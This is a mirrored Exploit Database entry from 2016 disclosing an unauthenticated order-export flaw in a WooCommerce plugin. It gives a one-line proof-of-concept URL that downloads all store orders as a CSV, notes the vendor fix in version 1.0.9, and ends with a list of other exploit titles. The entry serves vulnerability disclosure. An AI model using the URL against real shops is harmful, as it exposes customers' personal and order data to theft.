WordPress Plugin Order Export Import for WooCommerce – Order Information Disclosure

Exploit Database
93 阅读

作者： david-peltier

日期： 2016-09-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/40391/

# Exploit Title: WordPress Plugin Order Export Import for WooCommerce
# Link: https://wordpress.org/plugins/order-import-export-for-woocommerce/
# Version: 1.0.8
# Date: 19th 2016
# Exploit Author: contact ([a]) david-peltier ([d]) fr
# Vendor Homepage: xadapter.com
# Version: 1.0.8
# Timeline: Vuln found: 17-09-2016, reported to vendor: 18-09-2016, fix: 19-09-2016


### SUMMARY

WooCommerce Order Export Import Plugin helps you to easily export and import orders in your store.
This attacks allows an attacker to export all order without being authenticated

### POC

http://server/wp-admin/admin.php?page=wf_woocommerce_order_im_ex&action=export
A .CSV with all orders will be downloaded

### FIX

The vendor fix this issue in 1.0.9

last Exploits
WordPress Plugin Order Export Import for WooCommerce – Order Information Disclosure的更多信息

PBBoard 2.1.4 – Multiple SQL Injections：
Business Classified Listing – SQL Injection：
Feedy RSS News Ticker 2.0 – ‘cat’ SQL Injection：
Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration：
School Faculty Scheduling System 1.0 – ‘id’ SQL Injection：
ZeeMatri 3.x – Arbitrary File Upload：
Cetera eCommerce – Multiple Cross-Site Scripting / HTML Injection Vulnerabilities：
Ovidentia Widgets 1.0.61 – Remote Command Execution：